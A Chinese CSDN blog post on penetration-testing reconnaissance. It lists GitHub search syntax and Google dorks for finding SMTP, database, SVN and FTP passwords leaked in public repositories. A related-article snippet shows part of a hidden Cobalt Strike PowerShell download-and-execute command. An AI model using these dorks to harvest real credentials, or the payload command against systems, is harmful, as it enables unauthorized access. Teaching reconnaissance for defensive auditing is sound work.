github上的信息收集

最新推荐文章于 2024-04-25 20:50:46 发布
最新推荐文章于 2024-04-25 20:50:46 发布
阅读量1.6k 收藏 4
点赞数
分类专栏: 渗透测试 文章标签: github 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zlirving_/article/details/106852035
版权

今天学习除了google hack以外的关于github上信息收集的一些搜索语法(主要也是结合google)

Github是一个分布式的版本控制系统,目前拥有上百万万开发者用户。当今大规模数据**事情一直在发生,从未停止过,但有些人不知道的是很多时候这些事故,其实是我们自己无意中造成的,然而一个小疏忽,往往却造成一系列连锁反应……

Github上厂商信息的**,就是一个典型的例子,Github虽然方便开发者,有些开发人员将代码上传到代码库的时候,有可能连一些重要的配置信息也上传了,埋藏着一些安全隐患,侧面有利于扩大了攻击者、渗透人员对目标的攻击面。
 

Github的搜索语法
针对常见搜索开源项目
  1. 只想查找仓库名称包含XX的仓库
       in:name 关键词
  2. 查找描述的内容
      in:descripton 关键词
  3. 查README文件包含特定关键词
      in:readme 关键词
  4. star 数大于 1000 的XX 仓库
      stars: > 数字 关键字
  5. star 数在某个区间 的XX 仓库
      stars: 10…20 关键词
      
    更多github上的搜索语法
     
Google结合Github的搜索语法

很多网站及系统都会使用 pop3 和 smtp 发送来邮件,不少开发者由于安全意识不足会把相关的配置信息也放到Github上,所以如果这时候我们动用一下google搜索命令语句,构造一下关键字,就能把这些信息给找出来了。

邮件配置信息收集
site:Github.com smtp
site:Github.com smtp @qq.com
site:Github.com smtp @163.com
...
site:Github.com smtp password
site:Github.com String password smtp
...
我们也可以锁定域名搜索结合厂商域名 灵活运用例如搜百度的
site:Github.com smtp @baidu.com

在这里插入图片描述

数据库信息收集
site:Github.com sa password
site:Github.com root password
site:Github.com User ID=’sa’;Password
site:Github.com inurl:sql
...
进行 SVN 信息收集

SVN是一个开放源代码的版本控制系统,通过采用分支管理系统的高效管理,简而言之就是用于多个人共同开发同一个项目,实现共享资源,实现最终集中式的管理。

site:Github.com svn
site:Github.com svn username
site:Github.com svn password
site:Github.com svn username password
...
综合信息收集
site:Github.com password
site:Github.com ftp ftppassword
site:Github.com 密码
site:Github.com 内部
...

参考文章
 
GOT IT!

 
******************************************************
使用Github平台的程序员要谨慎!注意!保护自己的信息安全问题~

想冲大厂的癞蛤蟆
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
github信息收集.docx
04-08
github信息收集
Email邮箱搜集工具
12-19
Maxprog.eMail.Extractor可以从各种文件中提取出e-mail地址,并且把可用的地址输出到一个文件中去. Maxprog.eMail.Extractor是一款非常专业的Email邮箱搜集工具,对于有需要收集Email的人来说是一个很好用的工具。 Maxprog eMail Extractor可以从网站或HTML文件里抓取Email,还会顺着超连结的网页一直抓下去。可以设定扫瞄的深度,或忽略的条件等。支持多工载入网页,也支持proxy,并可透过命令列参数全自动执行。
Github敏感信息收集
03-08 1556
github基础搜索语法 利用以下语法,通过合理的排列组合,来搜索特定内容 仓库搜索 按照仓库、说明或者自诉文件内容进行搜索 通过限定符in限制在某一方面搜索,条件是可以共同使用的,可以提高精确度 jquery in:name //搜索名称中存在jquery的仓库 jquery in:description //说明中存在jquery的仓库 jquery in:readme //自诉文件中存在jquery的仓库 repo:owner/name //匹配特定仓库名 组织名和用户名 org:iqiyi
【小迪安全2023】个人学习笔记——信息收集(WAF扫描,github推送监控,封包监听工具,端口扫描)
最新发布
发布一些个人学习笔记,分享一些可能在安全学习道路上遇到的问题、心得,一起学习一起进步
04-25 1269
主要是信息收集阶段的一些思路,推荐了一些常用的信息收集网站或者项目的地址,主要涉及了网站依照搭建习惯的分类,网站端口扫描,WAF防护分析,teemo子域名枚举脚本,网站证书查询等信息收集阶段方面的内容
github搜索语法-信息搜集指南----总结
kuokay的博客
06-06 2964
您可以使用文件查找器在仓库中搜索文件。 要在 GitHub 上的多个仓库中搜索文件,请使用 filename 代码搜索限定符。提示:1.在 GitHub.com 上,导航到仓库的主页面。 2.在文件列表上方,单击 Go to file(转到文件)。 3.在搜索字段中,键入要查找文件的名称。 4.在结果列表中 ,单击要查找的文件。您可以在 GitHub 上搜索仓库,并使用这些仓库搜索限定符的任意组合缩小结果范围。您可以在所有 GitHub.com 内全局搜索仓库,也可以在特定组织内搜索仓库。要在搜索结果中
Cobaltstrike4.0系列 -- Beacon HTTP
weixin_41489908的博客
06-23 903
讲过去像是在卖惨,讲未来像是在白日做梦,讲现在又像是旁观者迷,迟迟无语,字字苦酸。。。 ---- 网易云热评 一、新建Listeners,点击save 二、利用powershell命令获取目标主机的Beacon 1、选择Attacks--WebDrive-by--ScriptedwebDelivery 2、选择添加的Listener,点击Launch 3、获取powershell的单行指令 powershell.exe -nop -w hidden -c "IEX ((ne...
Github信息收集骚姿势
kracer的博客
11-26 4467
目录 一、github搜索之基础语法 二、配合google语法使用 三、工具推荐 渗透中github敏感信息泄露的收集是个重要点,经常能发现员工上传的公司代码、用户名密码、个人信息和客户key等敏感信息。那GitHub有没有类似GoogleHack一系列的命令语法呢?如何使用高级命令语法进行信息收集让你我有意想不到的收获呢? 一、github搜索之基础语法 in:name test # 仓库标题搜索含有关键字test language:java...
推荐两款github敏感信息搜集工具(gsil、gshark)
技术超强的网络安全平台
08-02 1817
所以我们能在第一时间发现自己企业泄露了哪些信息或者获取别人énénén······是很有必要的,这时你就需要下面两个神器啦。# 一级分类,一般使用公司名,用作开启扫描的第一个参数(python gsil.py test)介绍:此工具主要用于GitHub敏感信息泄露的监控,可实现邮件实时告警,缺点不是可视化。直接点击上面的链接会跳到那个文件,这时你就可以愉快的寻找敏感信息啦,哦耶。不建议使用window部署,别问为什么,问就是“错错错,是我的错”一栏,点击开启,绑定QQ安全中心的用户需要输入app中的令牌。
渗透测试之git信息收集 (git介绍+github使用技巧)
hmysn的博客
05-18 1225
什么是git: git,我们叫做去中心化的版本控制软件。 大型的代码程序软件我们都是很多成员同步合作完成,但是这样就会导致出现代码被覆盖的情况,或者想要找过去版本比较困难的情况。于是就出现了版本控制系统来自动化的帮我们记录。 而去中心化的版本控制系统就是如今最常用,最成熟的代码管理方式,比如github就是去中心化的一个代码控制平台。 为什么git会导致信息泄漏 1、因为git的工作方式是把代码从本地保存后把私有仓库或者隐私文件上传到了github 2、部署项目的时候,不小心把 .git 文件一起
渗透测试-信息收集之Google hacking + GitHub
G3et的博客
03-11 580
Google hacking 是一种通过使用 Google 搜索引擎中的高级运算符来查找存储在网站上的敏感信息的技术。这可能包括登录凭据、敏感文件和其他敏感数据等信息GitHub 信息收集是通过分析目标在 GitHub 平台上的活动来收集信息的过程。这可能包括他们的代码库、开源贡献和任何其他公开可用的信息等。这两种技术都被认为是 OSINT(开源情报)的一种形式,经常被安全研究人员和渗透测试人员在尝试攻击之前收集目标信息使用。
【渗透测试】信息搜集总结
weixin_52450702的博客
01-17 4066
零零散散的发布过很多文章了,但是也没有完整的总结一下,今天就从信息搜集入手,系统的总结一下。一方面可以巩固自己的基础,作为自己的字典随用随查,另一方面希望对大家的学习和工作起到帮助作用。按照这个过程基本就可以较为完整地完成信息搜集了。下文中最常用的方法和网站我会做标红处理。子域名搜集在线网站搜集收集子域名可以扩大渗透范围,获得更多有关目标公司的资产信息,同一域名下的二级域名都属于目标范围,表现形式:域名加前缀,例如:域名zkaq.cn加前缀,。
最新敏感信息和目录收集技术
Ms08067安全实验室
07-06 495
点击星标,即时接收最新推文本文部分节选于《web安全攻防渗透测试实战指南(第二版)》,即将上架,敬请期待。敏感信息和目录收集目标域名可能存在较多的敏感目录和文件,这些敏感信息很可能存在目录穿越漏洞、文件上传漏洞,攻击者能通过这些漏洞直接下载网站源码。搜集这些信息对之后的渗透环节有帮助。通常,扫描检测方法有手动搜寻和自动工具查找两种方式,读者可以根据使用效果灵活决定使用哪种方式或两种方式都使用。1...
信息收集----目录扫描搜集与Git收集信息
qq_44418229的博客
05-03 1790
目录扫描收集信息与Git收集信息
GitHub敏感信息收集,SharpDecryptPwd 抓密码神器,MOSE-用于配置管理服务器的后期利用工具
代码讲故事
09-16 341
GitHub敏感信息收集,SharpDecryptPwd 抓密码神器,MOSE-用于配置管理服务器的后期利用工具。
GitHub信息收集
quixon的专栏
09-30 1278
目录桌面版脑图(DesktopNaotu) 桌面版脑图(DesktopNaotu) GitHub链接 桌面版脑图 (百度脑图离线版,思维导图) 跨平台支持 Windows/Linux/Mac OS. (A cross-platform multilingual Mind Map Tool) 操作系统 位数 对应文件 大小 支持情况 MacOS 64位 DesktopNaotu-ma...
gshark(github敏感信息搜集工具)
qq_50854662的博客
08-23 1942
gshark
利用google hacking和github进行信息收集
goddemon
09-12 2009
1. 利用google hacking进行信息收集(4个高级搜索命令) #①如收集学校的学号类 site:网站 学号类 #②查找邮件的密码类型 smtp(smtp方式进行查找) site:Github.com svn username(svn方式进行查找) site:Github.com root password(直接代查账号密码了状况特点) #③管理入口地址获取 site:xxx.com intext:管理、后台、登录、用户名、密码、系统、帐号 site:xxx.com inurl:login、adm
Python搜集Github中项目作者信息
you are sherlocked by me!
03-27 2308
我们将继续学习可视化部分的内容,我们将请求网站信息,并对这些信息进行可视化操作很多API都要求注册获得API秘钥后才能执行API调用,但是Github没有这样的要求https://api/github.com/将请求发送到GitHub网站中相应API调用的部分,search/repositories让API搜索Github上的所有仓库 后面是传递的一个实参 q表示查询,通过language:pyt...
github上有类似的开源项目吗
07-16
是的,在GitHub上有很多类似的开源项目可以用于数据采集和存储。以下是一些常见的开源项目: 1. Apache Kafka: 一个高吞吐量的分布式流处理平台,可以用于实时数据采集和消息传递。 2. Fluentd: 一个开源的日志收集器,支持多种输入输出插件,可用于日志的采集和存储。 3. Elasticsearch: 一个分布式搜索和分析引擎,可以用于实时数据的索引、查询和存储。 4. InfluxDB: 一个时间序列数据库,专注于高性能的时间序列数据的存储和查询。 5. Prometheus: 一个开源的监控和警告系统,用于采集和存储指标数据。 这些项目都提供了丰富的功能和灵活的配置选项,可以根据具体需求进行选择和使用。在GitHub上可以找到它们的源代码和文档,可以通过阅读文档和示例来了解如何使用它们进行数据采集和存储。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值